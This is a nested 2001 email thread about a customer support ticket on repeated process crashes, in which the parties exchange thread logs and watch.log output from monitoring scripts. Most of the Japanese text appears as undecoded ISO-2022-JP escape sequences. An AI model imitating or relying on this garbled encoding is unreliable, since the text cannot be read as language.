 &gt; &gt; &gt; &gt; Subject: Re: _x001b_$B;0I)2=3X%(%s%8%K%"%j%s%0MM%W%m%;%9%@%&amp;%s$K$D$$$F_x001b_(B
 &gt; &gt;  - ticket
 &gt; &gt; &gt; &gt; #53121OTC1 -
 &gt; &gt; &gt; &gt;
 &gt; &gt; &gt; &gt;
 &gt; &gt; &gt; &gt; OTC/_x001b_$B0KElMM_x001b_(B
 &gt; &gt; &gt; &gt; _x001b_$B$*@$OC$K$J$C$F$*$j$^$9!#_x001b_(B
 &gt; &gt; &gt; &gt;
 &gt; &gt; &gt; &gt; _x001b_$B?JD=$N3NG'$r$7$F$+$i#1=54V$?$A$^$7$?!#_x001b_(B
 &gt; &gt; &gt; &gt; _x001b_$BF|K\;~4V$NL@F|!"@hJ}$KJs9p$9$kI,MW$,$"$j$^$9$N$G_x001b_(B
 &gt; &gt; &gt; &gt; _x001b_$B$$$DD4::Js9p$r$$$?$@$1$k$N$+!"%9%1%8%e!&lt;%k$r_x001b_(B
 &gt; &gt; &gt; &gt; _x001b_$B$4O"Mm$7$F$$$?$@$/$3$H$H!"8=:_$^$G$ND4::FbMF$r_x001b_(B
 &gt; &gt; &gt; &gt; _x001b_$B$+$J$i$:!"Ls#1#4;~4V8e!JF|K\;~4V$N6bMKD+#9;~!K_x001b_(B
 &gt; &gt; &gt; &gt; _x001b_$B$^$G$K$*CN$i$;$/$@$5$$!#_x001b_(B
 &gt; &gt; &gt; &gt;
 &gt; &gt; &gt; &gt; _x001b_$B%-%d%N%sHNGd!J3t!K_x001b_(B
 &gt; &gt; &gt; &gt; _x001b_$B0KF#!!@55A_x001b_(B
 &gt; &gt; &gt; &gt;
 &gt; &gt; &gt; &gt; -------- Original Message --------
 &gt; &gt; &gt; &gt; Subject: RE: _x001b_$B;0I)2=3X%(%s%8%K%"%j%s%0MM%W%m%;%9%@%&amp;%s$K$D$$$F_x001b_(B
 &gt; &gt; &gt; &gt;  - ticket #53121OTC1 -
 &gt; &gt; &gt; &gt; Date: Fri, 12 Oct 2001 13:33:26 -0400
 &gt; &gt; &gt; &gt; From: "Hitoshi Ito" &lt;&gt;
 &gt; &gt; &gt; &gt; Reply-To: &lt;&gt;
 &gt; &gt; &gt; &gt; To: "'it-oh'" &lt;&gt;
 &gt; &gt; &gt; &gt; CC: &lt;&gt;,
 &gt; &gt; &gt; &gt; &lt;&gt;,&lt;
 &gt; &gt; &gt; &gt; &gt;, &lt;&gt;
 &gt; &gt; &gt; &gt; &gt;
 &gt; &gt; &gt; &gt; &gt; _x001b_$B%-%d%N%sHNGd!J3t!K_x001b_(B
 &gt; &gt; &gt; &gt; &gt; _x001b_$B0KF#MM_x001b_(B
 &gt; &gt; &gt; &gt; &gt;
 &gt; &gt; &gt; &gt; &gt; OpenText_x001b_$B$N0KEl$G$9!#$*@$OC$K$J$C$F$*$j$^$9!#_x001b_(B
 &gt; &gt; &gt; &gt; &gt;
 &gt; &gt; &gt; &gt; &gt; _x001b_$B$?$@$$$^3+H/$N$[$&amp;$G8!&gt;Z$7$F$*$j$^$9!#$o$+$j&lt;!Bh$*CN$i$;$$$?$7$^_x001b_(B
 &gt; &gt; _x001b_$B$9$N_x001b_(B
 &gt; &gt; &gt; &gt; _x001b_$B$G:#$7$P_x001b_(B
 &gt; &gt; &gt; &gt; &gt; _x001b_$B$i$/$*BT$A2&lt;$5$$!#_x001b_(B
 &gt; &gt; &gt; &gt; &gt;
 &gt; &gt; &gt; &gt; &gt; &gt; -----Original Message-----
 &gt; &gt; &gt; &gt; &gt; &gt; From: it-oh [mailto:]
 &gt; &gt; &gt; &gt; &gt; &gt; Sent: Friday, October 12, 2001 2:57 AM
 &gt; &gt; &gt; &gt; &gt; &gt; To: Hitoshi Ito
 &gt; &gt; &gt; &gt; &gt; &gt; Cc: ; ;
 &gt; &gt; &gt; &gt; &gt; &gt; ;
 &gt; &gt; &gt; &gt; &gt; &gt; Subject: Re:_x001b_$B;0I)2=3X%(%s%8%K%"%j%s%0MM%W%m%;%9%@%&amp;%s$K$D$$$F_x001b_(B
 &gt; &gt; &gt; &gt;  - ticket
 &gt; &gt; &gt; &gt; &gt; &gt; #53121OTC1 -
 &gt; &gt; &gt; &gt; &gt; &gt;
 &gt; &gt; &gt; &gt; &gt; &gt;
 &gt; &gt; &gt; &gt; &gt; &gt; OTC/_x001b_$B0KElMM_x001b_(B
 &gt; &gt; &gt; &gt; &gt; &gt; _x001b_$B$*@$OC$K$J$C$F$*$j$^$9!#_x001b_(B
 &gt; &gt; &gt; &gt; &gt; &gt;
 &gt; &gt; &gt; &gt; &gt; &gt; thread_x001b_$B%m%0$H_x001b_(Bwatch.log_x001b_$B$h$j%W%m%;%9%@%&amp;%s$K$D$$$F_x001b_(B
 &gt; &gt; &gt; &gt; &gt; &gt; _x001b_$B$J$K$+$o$+$j$^$7$?$G$7$g$&amp;$+!#_x001b_(B
 &gt; &gt; &gt; &gt; &gt; &gt; _x001b_$BMh=5$O$8$a$K!";0I)2=3X%(%s%8%K%"%j%s%0MM$KJs9p$9$k_x001b_(B
 &gt; &gt; &gt; &gt; &gt; &gt; _x001b_$BI,MW$,$"$j$^$9$N$G!"$4O"Mm$$$?$@$/$h$&amp;$*4j$$$$$?$7$^$9!#_x001b_(B
 &gt; &gt; &gt; &gt; &gt; &gt;
 &gt; &gt; &gt; &gt; &gt; &gt; _x001b_$B%-%d%N%sHNGd!J3t!K_x001b_(B
 &gt; &gt; &gt; &gt; &gt; &gt; _x001b_$B0KF#!!@55A_x001b_(B
 &gt; &gt; &gt; &gt; &gt; &gt;
 &gt; &gt; &gt; &gt; &gt; &gt; -------- Original Message --------
 &gt; &gt; &gt; &gt; &gt; &gt; Subject: [RE: _x001b_$B;0I)2=3X%(%s%8%K%"%j%s%0MM%W%m%;%9%@%&amp;%s$K$D$$$F_x001b_(B
 &gt; &gt; &gt; &gt; &gt; &gt;   - ticket #53121OTC1 -]
 &gt; &gt; &gt; &gt; &gt; &gt; Date: Wed, 10 Oct 2001 14:20:02 +0900
 &gt; &gt; &gt; &gt; &gt; &gt; From: it-oh &lt;&gt;
 &gt; &gt; &gt; &gt; &gt; &gt; To:
 &gt; &gt; &gt; &gt; &gt; &gt; CC: ,
 &gt; &gt; &gt; &gt; &gt; &gt; ,,
 &gt; &gt; &gt; &gt; &gt; &gt;
 &gt; &gt; &gt; &gt; &gt; &gt; &gt;
 &gt; &gt; &gt; &gt; &gt; &gt; &gt; OTC/_x001b_$B0KElMM_x001b_(B
 &gt; &gt; &gt; &gt; &gt; &gt; &gt; _x001b_$B$*@$OC$K$J$C$F$*$j$^$9!#_x001b_(B
 &gt; &gt; &gt; &gt; &gt; &gt; &gt;
 &gt; &gt; &gt; &gt; &gt; &gt; &gt; _x001b_$B;0I)2=3X%(%s%8%K%"%j%s%0MM_x001b_(B(NT)_x001b_$B$K$F%a%b%j4F;k$N@_Dj8e_x001b_(B
 &gt; &gt; &gt; &gt; &gt; &gt; &gt; 10_x001b_$B7n_x001b_(B5_x001b_$BF|$K%W%m%;%9%@%&amp;%s$,H/@8$7$^$7$?!#_x001b_(B
 &gt; &gt; &gt; &gt; &gt; &gt; &gt; _x001b_$B$=$N;~$N_x001b_(Bthread_x001b_$B%m%0$H_x001b_(Bwatch.log_x001b_$B$r_x001b_(Bftp_x001b_$B%5%$%H_x001b_(B
 &gt; &gt; &gt; &gt; &gt; &gt; &gt; _x001b_$B%f!&lt;%6!"!V_x001b_(Bmitsubishi chemical eng_x001b_$B!WFb$K%"%C%W%m!&lt;%I$7$^$7_x001b_(B
 &gt; &gt; _x001b_$B$?!#_x001b_(B
 &gt; &gt; &gt; &gt; &gt; &gt; &gt; _x001b_$B!V_x001b_(B20011005logs2.zip_x001b_$B!W$r$4Mw2&lt;$5$$!#_x001b_(B
 &gt; &gt; &gt; &gt; &gt; &gt; &gt; watch.log_x001b_$B$K$O!"F|;~$,=PNO$5$l$J$$$N$G$$$D$NCM$+$o$+$j$^$;$s$,_x001b_(B
 &gt; &gt; &gt; &gt; &gt; &gt; &gt; _x001b_$B:G=i$NCM$H:G8e$NCM$rHf3S$9$k$H_x001b_(BFaults_x001b_$B9`L\$,A}$($F$$$k0J30$O!"_x001b_(B
 &gt; &gt; &gt; &gt; &gt; &gt; &gt; _x001b_$BJQ2=$,$J$$$h$&amp;$K;W$o$l$^$9!#_x001b_(B
 &gt; &gt; &gt; &gt; &gt; &gt; &gt;
 &gt; &gt; &gt; &gt; &gt; &gt; &gt; _x001b_$B%W%m%;%9%@%&amp;%s$N860x$K$D$$$F$h$m$7$/$*4j$$$$$?$7$^$9!#_x001b_(B
 &gt; &gt; &gt; &gt; &gt; &gt; &gt;
 &gt; &gt; &gt; &gt; &gt; &gt; &gt; _x001b_$B%-%d%N%sHNGd!J3t!K_x001b_(B
 &gt; &gt; &gt; &gt; &gt; &gt; &gt; _x001b_$B0KF#!!@55A_x001b_(B
 &gt; &gt; &gt; &gt; &gt; &gt; &gt;
 &gt; &gt; &gt; &gt; &gt; &gt; &gt; -------- Original Message --------
 &gt; &gt; &gt; &gt; &gt; &gt; &gt; Subject: RE: _x001b_$B;0I)2=3X%(%s%8%K%"%j%s%0MM%W%m%;%9%@%&amp;%s$K$D$$$F_x001b_(B
 &gt; &gt; &gt; &gt; &gt; &gt;   - ticket #53121OTC1 -
 &gt; &gt; &gt; &gt; &gt; &gt; &gt; Date: Tue, 11 Sep 2001 13:31:52 -0400
 &gt; &gt; &gt; &gt; &gt; &gt; &gt; From: "Hitoshi Ito" &lt;&gt;
 &gt; &gt; &gt; &gt; &gt; &gt; &gt; Reply-To: &lt;&gt;
 &gt; &gt; &gt; &gt; &gt; &gt; &gt; To: "'it-oh'" &lt;&gt;
 &gt; &gt; &gt; &gt; &gt; &gt; &gt; CC: &lt;&gt;,
 &gt; &gt; &gt; &gt; &gt; &gt; &lt;&gt;,&lt;&gt;,
 &gt; &gt; &gt; &gt; &gt; &gt;  &lt;&gt;
 &gt; &gt; &gt; &gt; &gt; &gt; &gt;
 &gt; &gt; &gt; &gt; &gt; &gt; &gt; _x001b_$B%-%d%N%sHNGd!J3t!K_x001b_(B
 &gt; &gt; &gt; &gt; &gt; &gt; &gt; _x001b_$B0KF#MM_x001b_(B
 &gt; &gt; &gt; &gt; &gt; &gt; &gt;
 &gt; &gt; &gt; &gt; &gt; &gt; &gt; OpenText_x001b_$B$N0KEl$G$9!#$*@$OC$K$J$C$F$*$j$^$9!#_x001b_(B
 &gt; &gt; &gt; &gt; &gt; &gt; &gt;
 &gt; &gt; &gt; &gt; &gt; &gt; &gt; _x001b_$B3NG'$r&lt;h$j$^$7$?$,!"$3$l$G4V0c$$$J$$$h$&amp;$G$9!#_x001b_(Bthread_x001b_$B%m%0$H$"_x001b_(B
 &gt; &gt; _x001b_$B$o$;_x001b_(B
 &gt; &gt; &gt; &gt; _x001b_$B$F8+_x001b_(B
 &gt; &gt; &gt; &gt; &gt; &gt; _x001b_$B$F!"_x001b_(B
 &gt; &gt; &gt; &gt; &gt; &gt; &gt; _x001b_$B%a%b%j$N;HMQ&gt;u67$rD4::$9$k$h$&amp;$G$9!#2a5n$N;vNc$^$G$O$o$+$j$^_x001b_(B
 &gt; &gt; _x001b_$B$;$s_x001b_(B
 &gt; &gt; &gt; &gt; _x001b_$B$G$7_x001b_(B
 &gt; &gt; &gt; &gt; &gt; &gt; _x001b_$B$?$,_x001b_(B
 &gt; &gt; &gt; &gt; &gt; &gt; &gt; _x001b_$B2?EY$+KLJF$N$*5RMM$KBP$7$F;HMQ$5$l$?$3$H$,$"$k$h$&amp;$G$9!#_x001b_(B
 &gt; &gt; &gt; &gt; &gt; &gt; &gt;
 &gt; &gt; &gt; &gt; &gt; &gt; &gt; _x001b_$B$h$m$7$/$*4j$$$7$^$9!#_x001b_(B
 &gt; &gt; &gt; &gt; &gt; &gt; &gt;
 &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; -----Original Message-----
 &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; From: it-oh [mailto:]
 &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; Sent: Tuesday, September 11, 2001 4:19 AM
 &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; To:
 &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; Cc: ;
 &gt; &gt; &gt; &gt; ;
 &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; ;
 &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; Subject: Re: _x001b_$B;0I)2=3X%(%s%8%K%"%j%s%0MM%W%m%;%9%@%&amp;%s$K$D$$_x001b_(B
 &gt; &gt; _x001b_$B$F_x001b_(B
 &gt; &gt; &gt; &gt; &gt; &gt;  - ticket
 &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; #53121OTC1 -
 &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt;
 &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt;
 &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; _x001b_$B0KElMM_x001b_(B
 &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; _x001b_$B$*@$OC$K$J$C$F$*$j$^$9!#_x001b_(B
 &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt;
 &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; perl_x001b_$B$r%$%s%9%H!&lt;%k$7!"J@&lt;R4D6-$G=PNO$5$l$?_x001b_(Bwatch.log_x001b_$B%U%!%$%k_x001b_(B
 &gt; &gt; _x001b_$B$rE:_x001b_(B
 &gt; &gt; &gt; &gt; _x001b_$BIU$7_x001b_(B
 &gt; &gt; &gt; &gt; &gt; &gt; _x001b_$B$^$9_x001b_(B
 &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; _x001b_$B!#$3$N%U%!%$%k$G$h$m$7$$$G$7$g$&amp;$+!#_x001b_(B
 &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; _x001b_$B$h$1$l$P!";0I)2=3XMM$K@_Dj$7%W%m%;%9%@%&amp;%s$^$G%m%0$r=PNO$9_x001b_(B
 &gt; &gt; _x001b_$B$k@__x001b_(B
 &gt; &gt; &gt; &gt; _x001b_$BDj$K_x001b_(B
 &gt; &gt; &gt; &gt; &gt; &gt; _x001b_$B$7$F_x001b_(B
 &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; _x001b_$B$$$?$@$-$^$9!#_x001b_(B
 &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; _x001b_$B$J$*!"$3$N%m%0$K$O!";~9o$,=PNO$5$l$k$h$&amp;$K$J$C$F$$$^$;$s$,_x001b_(B
 &gt; &gt; _x001b_$B!"%W_x001b_(B
 &gt; &gt; &gt; &gt; _x001b_$B%m%;_x001b_(B
 &gt; &gt; &gt; &gt; &gt; &gt; _x001b_$B%9%@_x001b_(B
 &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; _x001b_$B%&amp;%s$H$N4X78$,$o$+$k$N$G$7$g$&amp;$+!#_x001b_(B
 &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; _x001b_$B%m%0FbMF$N@bL@$H!"2a5n$K$3$N%m%0$+$i$o$+$C$?;vNc$r$4O"Mm$/_x001b_(B
 &gt; &gt; _x001b_$B$@$5_x001b_(B
 &gt; &gt; &gt; &gt; _x001b_$B$$!#_x001b_(B
 &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt;
 &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; _x001b_$B$h$m$7$/$*4j$$$$$?$7$^$9!#_x001b_(B
 &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt;
 &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; _x001b_$B%-%d%N%sHNGd!J3t!K_x001b_(B
 &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; _x001b_$B0KF#!!@55A_x001b_(B
 &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt;
 &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt;
 &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; -------- Original Message --------
 &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; Subject: RE: _x001b_$B;0I)2=3X%(%s%8%K%"%j%s%0MM%W%m%;%9%@%&amp;%s$K$D$$_x001b_(B
 &gt; &gt; _x001b_$B$F_x001b_(B
 &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt;  - ticket #53121OTC1 -
 &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; Date: Mon, 10 Sep 2001 15:44:26 -0400
 &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; From: "Hitoshi Ito" &lt;&gt;
 &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; Reply-To: &lt;&gt;
 &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; To: "'it-oh'" &lt;&gt;
 &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; CC: &lt;&gt;,
 &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt;
 &gt; &gt; &lt;&gt;,&lt;&gt;,
 &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt;  &lt;&gt;
 &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt;
 &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; _x001b_$B%-%d%N%sHNGd!J3t!K_x001b_(B
 &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; _x001b_$B0KF#MM_x001b_(B
 &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt;
 &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; OpenText_x001b_$B$N0KEl$G$9!#$*@$OC$K$J$C$F$*$j$^$9!#_x001b_(B
 &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; _x001b_$B3+H/$+$i$NJV;v$,$"$j$^$7$?$N$G$*CN$i$;$$$?$7$^$9!#_x001b_(B
 &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt;
 &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; They seem to have quite a few crashes when the
 &gt; &gt; &gt; &gt; system seem to
 &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; be allocating
 &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; a pointer and then jumping off into the oblivion.
 &gt; &gt; &gt; &gt; I'd say we
 &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; should get
 &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; them watch.pl to see if they're running out of
 &gt; &gt; memory.  The
 &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; crashes are all
 &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; over the map but all of them seem to relate
 &gt; &gt; back to being
 &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; unable to trying
 &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; to get memory or to having an invalid pointer
 &gt; &gt; of some sort.
 &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt;
 &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; _x001b_$B$H$$$&amp;$3$H$G!"%a%b%jITB-$J$I$,860x$H$J$C$F%W%m%;%9%@%&amp;%s$,_x001b_(B
 &gt; &gt; _x001b_$B5/$3_x001b_(B
 &gt; &gt; &gt; &gt; _x001b_$B$C$F_x001b_(B
 &gt; &gt; &gt; &gt; &gt; &gt; _x001b_$B$$$k_x001b_(B
 &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; _x001b_$B$N$G$O$J$$$+$H9M$($F$$$k$h$&amp;$G$9!#_x001b_(B
 &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt;
 &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; _x001b_$BE:IU$N_x001b_(BZIP_x001b_$B%U%!%$%k$r$4;2&gt;H2&lt;$5$$!#@bL@$N_x001b_(BWord_x001b_$B%I%-%e%a%s%H$,$"_x001b_(B
 &gt; &gt; _x001b_$B$j$^_x001b_(B
 &gt; &gt; &gt; &gt; _x001b_$B$9$,_x001b_(B
 &gt; &gt; &gt; &gt; &gt; &gt; _x001b_$B!"_x001b_(B
 &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; _x001b_$B$3$3$G8@5Z$5$l$F$$$k_x001b_(Btest.pl_x001b_$B%9%/%j%W%H$O!"$b$&amp;;HMQ$5$l$F$$$J_x001b_(B
 &gt; &gt; _x001b_$B$$$H_x001b_(B
 &gt; &gt; &gt; &gt; _x001b_$B$$$&amp;_x001b_(B
 &gt; &gt; &gt; &gt; &gt; &gt; _x001b_$B$3$H_x001b_(B
 &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; _x001b_$B$G$9!#;d$N_x001b_(BWin2k_x001b_$B4D6-$G$O!"JQ$o$j$K_x001b_(Bwatchpslist.pl_x001b_$B%9%/%j%W%H$r_x001b_(B
 &gt; &gt; _x001b_$B;HMQ_x001b_(B
 &gt; &gt; &gt; &gt; _x001b_$B$7_x001b_(B
 &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; _x001b_$BF0:n$r3NG'$$$?$7$^$7$?!#$43NG'2&lt;$5$$!#_x001b_(B
 &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt;
 &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; _x001b_$B$3$N%9%/%j%W%H$r;HMQ$7!";0I)2=3XMM$N%5%$%H$G%m%0$r&lt;hF@8e!"_x001b_(B
 &gt; &gt; &gt; &gt; thread_x001b_$B%m_x001b_(B
 &gt; &gt; &gt; &gt; &gt; &gt; _x001b_$B%0_x001b_(B
 &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; _x001b_$B$H_x001b_(Bwatch.log_x001b_$B$r$3$A$i$^$G$*Aw$j2&lt;$5$$!#$h$m$7$/$*4j$$CW$7$^$9_x001b_(B
 &gt; &gt; _x001b_$B!#_x001b_(B
 &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt;
 &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt;
 &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; -----Original Message-----
 &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; From: Hitoshi Ito [mailto:]
 &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; Sent: Friday, September 07, 2001 4:38 PM
 &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; To: 'it-oh'
 &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; Cc: '';
 &gt; &gt; &gt; &gt; &gt; &gt; '';
 &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; ''; ''
 &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; Subject: RE: _x001b_$B;0I)2=3X%(%s%8%K%"%j%s%0MM%W%m%;%9%@%&amp;%s$K$D_x001b_(B
 &gt; &gt; _x001b_$B$$$F_x001b_(B
 &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt;  - ticket
 &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; #53121OTC1 -
 &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt;
 &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt;
 &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; _x001b_$B%-%d%N%sHNGd!J3t!K_x001b_(B
 &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; _x001b_$B0KF#MM_x001b_(B
 &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt;
 &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; OpenText_x001b_$B$N0KEl$G$9!#$*@$OC$K$J$C$F$*$j$^$9!#_x001b_(B
 &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt;
 &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; _x001b_$B$3$N7o$K4X$7$^$7$F%^%M!&lt;%8%c!&lt;$^$GJs9p$7!";0I)EE5!MM$N;~_x001b_(B
 &gt; &gt; _x001b_$B$N$h_x001b_(B
 &gt; &gt; &gt; &gt; _x001b_$B$&amp;$K_x001b_(B
 &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; _x001b_$B%7%+%4$N3+H/$N$[$&amp;$X%m%0$rAw$jD4::$5$;$k$3$H$K$J$j$^$7$?_x001b_(B
 &gt; &gt; _x001b_$B!#2?_x001b_(B
 &gt; &gt; &gt; &gt; _x001b_$B$+$o_x001b_(B
 &gt; &gt; &gt; &gt; &gt; &gt; _x001b_$B$+$j_x001b_(B
 &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; _x001b_$B&lt;!Bh$4O"Mm$$$?$7$^$9$N$G!":#$7$P$i$/$*BT$A$/$@$5$$!#_x001b_(B
 &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt;
 &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; _x001b_$B$h$m$7$/$*4j$$CW$7$^$9!#_x001b_(B
 &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt;
 &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; -----Original Message-----
 &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; From: it-oh [mailto:]
 &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; Sent: Friday, September 07, 2001 4:34 AM
 &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; To:
 &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; Cc: ;
 &gt; &gt; &gt; &gt; &gt; &gt; ;
 &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; ;
 &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; Subject: _x001b_$B;0I)2=3X%(%s%8%K%"%j%s%0MM%W%m%;%9%@%&amp;%s$K$D$$_x001b_(B
 &gt; &gt; _x001b_$B$F_x001b_(B
 &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt;
 &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt;
 &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; OTC/_x001b_$B0KElMM_x001b_(B
 &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; _x001b_$B$*@$OC$K$J$C$F$*$j$^$9!#_x001b_(B
 &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt;
 &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; _x001b_$B;0I)2=3X%(%s%8%K%"%j%s%0MM_x001b_(B(NT_x001b_$B%f!&lt;%6_x001b_(B)_x001b_$B$K$F%W%m%;%9%@%&amp;%s_x001b_(B
 &gt; &gt; _x001b_$B$,B?_x001b_(B
 &gt; &gt; &gt; &gt; _x001b_$BH/$7_x001b_(B
 &gt; &gt; &gt; &gt; &gt; &gt; _x001b_$B$F$$_x001b_(B
 &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; _x001b_$B$^_x001b_(B
 &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; _x001b_$B$9_x001b_(B
 &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; _x001b_$B!#_x001b_(B
 &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; _x001b_$B#67n#2#6F|$+$i#87n#1#0F|$^$G$N%m%0$,0lEY$KAw$i$l$F$-$^_x001b_(B
 &gt; &gt; _x001b_$B$7$?_x001b_(B
 &gt; &gt; &gt; &gt; _x001b_$B!#_x001b_(B
 &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; Solaris_x001b_$B4D_x001b_(B
 &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; _x001b_$B6-_x001b_(B
 &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; _x001b_$B$N;0I)EE5!MM$h$j%W%m%;%9%@%&amp;%s$NIQEY$,9b$$$G$9!#_x001b_(B
 &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt;
 &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; _x001b_$B%m%0$O!"_x001b_(Bftp_x001b_$B%5%$%H!V!W%f!&lt;%6$N!V_x001b_(Bmitsubishi
 &gt; &gt; cemical eng_x001b_$B!W_x001b_(B
 &gt; &gt; &gt; &gt; _x001b_$B%U%)_x001b_(B
 &gt; &gt; &gt; &gt; &gt; &gt; _x001b_$B%k%@_x001b_(B
 &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; _x001b_$BFb_x001b_(B
 &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; _x001b_$B$K_x001b_(B
 &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; _x001b_$B%"%C%W$7$^$7$?!#_x001b_(B
 &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; _x001b_$BESCf$G=*N;$7$F$$$k_x001b_(Bthread_x001b_$B%m%0$N:G=*=hM}$O!"$5$^$6$^$J%Q_x001b_(B
 &gt; &gt; _x001b_$B%?!&lt;_x001b_(B
 &gt; &gt; &gt; &gt; _x001b_$B%s$,_x001b_(B
 &gt; &gt; &gt; &gt; &gt; &gt; _x001b_$B$"$j_x001b_(B
